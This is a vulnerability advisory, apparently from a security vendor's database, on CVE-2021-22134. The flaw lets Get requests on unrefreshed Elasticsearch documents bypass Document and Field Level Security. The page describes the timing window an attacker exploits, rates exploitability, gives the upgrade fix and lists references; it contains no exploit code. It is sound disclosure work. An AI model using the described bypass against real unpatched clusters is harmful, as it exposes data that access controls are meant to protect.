BIT-elasticsearch-2021-22134
Information Disclosure vulnerability in elasticsearch (Maven)
What is BIT-elasticsearch-2021-22134 About?
This vulnerability is an Information Disclosure flaw in Elasticsearch versions after 7.6.0 and before 7.11.0, specifically when Document or Field Level Security is enabled. Get requests can bypass security permissions for recently updated documents, leading to the disclosure of sensitive information. Exploitation is possible if an attacker queries recently updated documents before they are refreshed in the index.
Affected Software
Technical Details
The flaw exists in Elasticsearch in versions after 7.6.0 and before 7.11.0 when Document or Field Level Security (DLS/FLS) is in use. Specifically, 'Get' requests made against recently updated documents do not properly apply the configured security permissions. This occurs because the security checks are bypassed for documents that have been modified but not yet fully refreshed within the index. Consequently, an attacker can make a 'Get' request for an unrefreshed document and successfully retrieve its contents or identify its existence, even if DLS/FLS rules are configured to restrict access to that document or its fields.
What is the Impact of BIT-elasticsearch-2021-22134?
Successful exploitation may allow attackers to access sensitive data, including restricted documents and fields they should not have permission to view. This can lead to unauthorized information exposure and potential policy violations.
What is the Exploitability of BIT-elasticsearch-2021-22134?
Exploitation of this Information Disclosure vulnerability typically requires an understanding of Elasticsearch's indexing and refreshing mechanisms. The complexity is moderate, as it relies on querying recently updated documents before they are refreshed, a timing-sensitive operation. Attackers would need 'Get' request capabilities, which may or may not require authentication depending on the Elasticsearch setup; however, it bypasses granular Document or Field Level Security permissions. This is likely a remote exploit scenario, assuming the attacker has network access to Elasticsearch. The primary risk factor is the presence of sensitive documents that are frequently updated, creating a window for exploitation.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | ||
What are the Available Fixes for BIT-elasticsearch-2021-22134?
Available Upgrade Options
- org.elasticsearch:elasticsearch
- >7.6.0, <7.11.0 → Upgrade to 7.11.0
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://security.netapp.com/advisory/ntap-20210430-0006
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://security.netapp.com/advisory/ntap-20210430-0006/
- https://nvd.nist.gov/vuln/detail/CVE-2021-22134
- https://osv.dev/vulnerability/GHSA-hwvv-438r-mhvj
- https://discuss.elastic.co/t/elastic-stack-7-11-0-security-update/265835
- https://discuss.elastic.co/t/elastic-stack-7-11-0-security-update/265835
What are Similar Vulnerabilities to BIT-elasticsearch-2021-22134?
Similar Vulnerabilities: CVE-2021-44228 , CVE-2021-4104 , CVE-2021-22926 , CVE-2020-13939 , CVE-2020-1945
